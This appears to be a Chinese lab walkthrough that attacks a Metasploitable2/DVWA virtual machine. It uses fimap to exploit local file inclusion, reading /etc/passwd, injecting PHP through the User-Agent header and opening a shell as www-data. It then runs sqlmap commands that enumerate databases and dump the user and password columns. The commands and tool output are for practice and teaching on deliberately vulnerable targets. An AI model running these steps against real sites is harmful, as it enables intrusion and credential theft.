使用Fimap和metasploitable2文件包含漏洞测试

fimap

首先查看msf已经存在的漏洞:





root@kali:~# fimap -u 'http://192.168.136.130/lfi.php?page=index.php' --force-run

fimap v.1.00_svn (My life for Aiur)

:: Automatic LFI/RFI scanner and exploiter

:: by Iman Karim (fimap.dev@gmail.com)

SingleScan is testing URL: 'http://192.168.136.130/lfi.php?page=index.php'

[05:57:09] [OUT] Inspecting URL 'http://192.168.136.130/lfi.php?page=index.php'...

[05:57:09] [INFO] Fiddling around with URL...

[05:57:09] [OUT] [PHP] Possible file inclusion found! -> 'http://192.168.136.130/lfi.php?page=IzIjx0Ao' with Parameter 'page'.

[05:57:09] [OUT] [PHP] Identifying Vulnerability 'http://192.168.136.130/lfi.php?page=index.php' with Parameter 'page'...

[05:57:09] [INFO] Scriptpath received: '/var/www'

[05:57:09] [INFO] Operating System is 'Unix-Like'.

[05:57:09] [INFO] Testing file '/etc/passwd'...

[05:57:09] [INFO] Testing file '/proc/self/environ'...

[05:57:09] [INFO] Testing file 'php://input'...

[05:57:09] [INFO] Testing file '/var/log/apache2/access.log'...

[05:57:09] [INFO] Testing file '/var/log/apache/access.log'...

[05:57:09] [INFO] Testing file '/var/log/httpd/access.log'...

[05:57:09] [INFO] Testing file '/var/log/apache2/access_log'...

[05:57:09] [INFO] Testing file '/var/log/apache/access_log'...

[05:57:09] [INFO] Testing file '/var/log/httpd/access_log'...

[05:57:09] [INFO] Testing file '/apache/logs/access.log'...

[05:57:09] [INFO] Testing file '/apache/logs/access_log'...

[05:57:09] [INFO] Testing file '/apache2/logs/access.log'...

[05:57:09] [INFO] Testing file '/apache2/logs/access_log'...

[05:57:09] [INFO] Testing file '/etc/httpd/logs/access_log'...

[05:57:10] [INFO] Testing file '/etc/httpd/logs/access.log'...

[05:57:10] [INFO] Testing file '/var/httpd/logs/access_log'...

[05:57:10] [INFO] Testing file '/var/httpd/logs/access.log'...

[05:57:10] [INFO] Testing file '/var/www/logs/access_log'...

[05:57:10] [INFO] Testing file '/var/www/logs/access.log'...

[05:57:10] [INFO] Testing file '/usr/local/apache/logs/access_log'...

[05:57:10] [INFO] Testing file '/usr/local/apache/logs/access.log'...

[05:57:10] [INFO] Testing file '/usr/local/apache2/logs/access_log'...

[05:57:10] [INFO] Testing file '/usr/local/apache2/logs/access.log'...

[05:57:10] [INFO] Testing file '/var/log/access_log'...

[05:57:10] [INFO] Testing file '/var/log/access.log'...

[05:57:10] [INFO] Testing file '/logs/access.log'...

[05:57:10] [INFO] Testing file '/logs/access_log'...

[05:57:10] [INFO] Testing file '/opt/lampp/logs/access_log'...

[05:57:10] [INFO] Testing file '/opt/lampp/logs/access.log'...

[05:57:10] [INFO] Testing file '/opt/xampp/logs/access.log'...

[05:57:10] [INFO] Testing file '/opt/xampp/logs/access_log'...

[05:57:10] [INFO] Testing file '/var/log/auth.log'...

[05:57:10] [INFO] Testing file '/var/log/secure'...

[05:57:10] [INFO] Testing file 'http://www.tha-imax.de/fimap_testfiles/test'...

##################################################################

#[1] Possible PHP-File Inclusion                                 #

##################################################################

#::REQUEST                                                       #

#  [URL]        http://192.168.136.130/lfi.php?page=index.php    #

#  [HEAD SENT]                                                   #

#::VULN INFO                                                     #

#  [GET PARAM]  page                                             #

#  [PATH]       /var/www                                         #

#  [OS]         Unix                                             #

#  [TYPE]       Absolute Clean                                   #

#  [TRUNCATION] No Need. It's clean.                             #

#  [READABLE FILES]                                              #

#                   [0] /etc/passwd                              #

#                   [1] /proc/self/environ                       #

#                   [2] /var/log/auth.log                        #

##################################################################

root@kali:~# clear

root@kali:~# fimap -x --force-run

fimap v.1.00_svn (My life for Aiur)

:: Automatic LFI/RFI scanner and exploiter

:: by Iman Karim (fimap.dev@gmail.com)

###########################

#:: List of Domains ::    #

###########################

#[1] 192.168.136.130      #

#[q] Quit                 #

###########################

Choose Domain: 1

#####################################################################################################

#:: FI Bugs on '192.168.136.130' ::                                                                 #

#####################################################################################################

#[1] URL: '/lfi.php?page=index.php' injecting file: '/proc/self/environ' using GET-param: 'page'    #

#[2] URL: '/lfi.php?page=index.php' injecting file: '/var/log/auth.log' using GET-param: 'page'     #

#[q] Quit                                                                                           #

#####################################################################################################

Choose vulnerable script: 1

[06:01:09] [INFO] Testing PHP-code injection thru User-Agent...

[06:01:09] [OUT] PHP Injection works! Testing if execution works...

[06:01:09] [INFO] Testing execution thru 'popen[b64]'...

[06:01:09] [OUT] Execution thru 'popen[b64]' works!

####################################################

#:: Available Attacks - PHP and SHELL access ::    #

####################################################

#[1] Spawn fimap shell                             #

#[2] Spawn pentestmonkey's reverse shell           #

#[3] [Test Plugin] Show some info                  #

#[q] Quit                                          #

####################################################

Choose Attack: 1

Please wait - Setting up shell (one request)...

-------------------------------------------

Welcome to fimap shell!

Better don't start interactive commands! ;)

Also remember that this is not a persistent shell.

Every command opens a new shell and quits it after that!

Enter 'q' to exit the shell.

-------------------------------------------

fishell@www-data:/var/www$>

使用sqlmap和metasploitable2进行SQL注入实验

实验环境是kali的sqlmap和metasploit2.
root@kali:~# sqlmap -u "http://192.168.136.130/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie='PHPSSID=31e286bfcb5f99785b26e2af656da170;sercurity=low'



root@kali:~# sqlmap -u "http://192.168.136.130/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie='PHPSSID=31e286bfcb5f99785b26e2af656da170;sercurity=low' --current-user



root@kali:~# sqlmap -u "http://192.168.136.130/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie='PHPSSID=31e286bfcb5f99785b26e2af656da170;sercurity=low' --current-db



root@kali:~# sqlmap -u "http://192.168.136.130/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie='PHPSSID=31e286bfcb5f99785b26e2af656da170;sercurity=low' -dbs



root@kali:~# sqlmap -u "http://192.168.136.130/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie='PHPSSID=31e286bfcb5f99785b26e2af656da170;sercurity=low' -users



root@kali:~# sqlmap -u "http://192.168.136.130/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie='PHPSSID=31e286bfcb5f99785b26e2af656da170;sercurity=low' --table -D dvwa



root@kali:~# sqlmap -u "http://192.168.136.130/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie='PHPSSID=31e286bfcb5f99785b26e2af656da170;sercurity=low' --column -T users -D dvwa



root@kali:~# sqlmap -u "http://192.168.136.130/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie='PHPSSID=31e286bfcb5f99785b26e2af656da170;sercurity=low' --dump -C user,password -T users -D dvwa

metasploitable实践的更多相关文章

  1. 功防技术与实践第1.2章,kali初步了解

    20169314 2016-2017-2 <网络攻防实践>/<网络攻击与防范>第2周学习总结 一.教材学习内容总结 1.hacker和cracker的区别 网络攻防分三部分:系 ...

  2. webp图片实践之路

    最近,我们在项目中实践了webp图片,并且抽离出了工具模块,整合到了项目的基础模板中.传闻IOS10也将要支持webp,那么使用webp带来的性能提升将更加明显.估计在不久的将来,webp会成为标配. ...

  3. Hangfire项目实践分享

    Hangfire项目实践分享 目录 Hangfire项目实践分享 目录 什么是Hangfire Hangfire基础 基于队列的任务处理(Fire-and-forget jobs) 延迟任务执行(De ...

  4. TDD在Unity3D游戏项目开发中的实践

    0x00 前言 关于TDD测试驱动开发的文章已经有很多了,但是在游戏开发尤其是使用Unity3D开发游戏时,却听不到特别多关于TDD的声音.那么本文就来简单聊一聊TDD如何在U3D项目中使用以及如何使 ...

  5. Logstash实践: 分布式系统的日志监控

    文/赵杰 2015.11.04 1. 前言 服务端日志你有多重视? 我们没有日志 有日志,但基本不去控制需要输出的内容 经常微调日志,只输出我们想看和有用的 经常监控日志,一方面帮助日志微调,一方面及 ...

  6. 【大型网站技术实践】初级篇:借助Nginx搭建反向代理服务器

    一.反向代理:Web服务器的“经纪人” 1.1 反向代理初印象 反向代理(Reverse Proxy)方式是指以代理服务器来接受internet上的连接请求,然后将请求转发给内部网络上的服务器,并将从 ...

  7. Windows平台分布式架构实践 - 负载均衡

    概述 最近.NET的世界开始闹腾了,微软官方终于加入到了对.NET跨平台的支持,并且在不久的将来,我们在VS里面写的代码可能就可以通过Mono直接在Linux和Mac上运行.那么大家(开发者和企业)为 ...

  8. Mysql事务探索及其在Django中的实践(二)

    继上一篇<Mysql事务探索及其在Django中的实践(一)>交代完问题的背景和Mysql事务基础后,这一篇主要想介绍一下事务在Django中的使用以及实际应用给我们带来的效率提升. 首先 ...

  9. Mysql事务探索及其在Django中的实践(一)

    前言 很早就有想开始写博客的想法,一方面是对自己近期所学知识的一些总结.沉淀,方便以后对过去的知识进行梳理.追溯,一方面也希望能通过博客来认识更多相同技术圈的朋友.所幸近期通过了博客园的申请,那么今天 ...

随机推荐

  1. wamp安装后无法正常启动(80端口被占用)

    关于wamp启动是80端口被占用的问题详解(win7系统下WAMP 80端口被Microsoft-HTTPAPI/2.0占用的解决办法) VS2010在更新了SP1后,会在开机时自动启动一个服务,占用 ...

  2. const 补充

    char const* ptr1const char * ptr2char * const ptr3 看到这三个const作何感想 其实const比较好理解的是const 后面整体是不能改变的(整体的 ...

  3. vs2010 光盘镜像免输入KEY 序列号

    用ULTRA ISO打开VS2010 ISO文件.找到\Setup\setup.sdb,提取出来编辑.用记事本打开.搜索到[Product Key]配置节,如果下面为空,补上KEY.如果是试用KEY, ...

  4. 复制mysql数据库的步骤

    Navicat 转存sql文件 然后命令 mysql -uroot -p123456 dbname < e:/backup/20141014.sql

  5. genmotion 安装 app 报错 This application is't compatible with your mobile phone解决办法

    请下载这个文件:http://pan.baidu.com/s/1jIyMNbg(一个zip包) 将这个zip包拖放到genymotion的屏幕中,安装,然后重启就行了 我安装的Samsung Gala ...

  6. 微软开源rDSN分布式系统开发框架

    摘要:微软亚洲研究院系统组开发的分布式系统开发框架——Robust Distributed System Nucleus(rDSN)正式在GitHub平台开源.据悉,rDSN是一个旨在为广大分布式系统 ...

  7. 学习blus老师js(2)--深入JavaScript

    1.函数传参 可变参(不定参):arguments 参数的个数可变,参数数组   例1.求和 求所有参数的和 <!DOCTYPE HTML> <html> <head&g ...

  8. HDU 4586 Play the Dice(数学期望)

    Play the Dice Time Limit: 2000/1000 MS (Java/Others)    Memory Limit: 65535/32768 K (Java/Others)Tot ...

  9. 【UVA】10635 Prince and Princess(LCS)

    题目 传送门:QWQ 分析 水题.$ O(nlogn) $的LCS 代码 #include <bits/stdc++.h> using namespace std; *, INF=1e9; ...

  10. MySQL 存储配置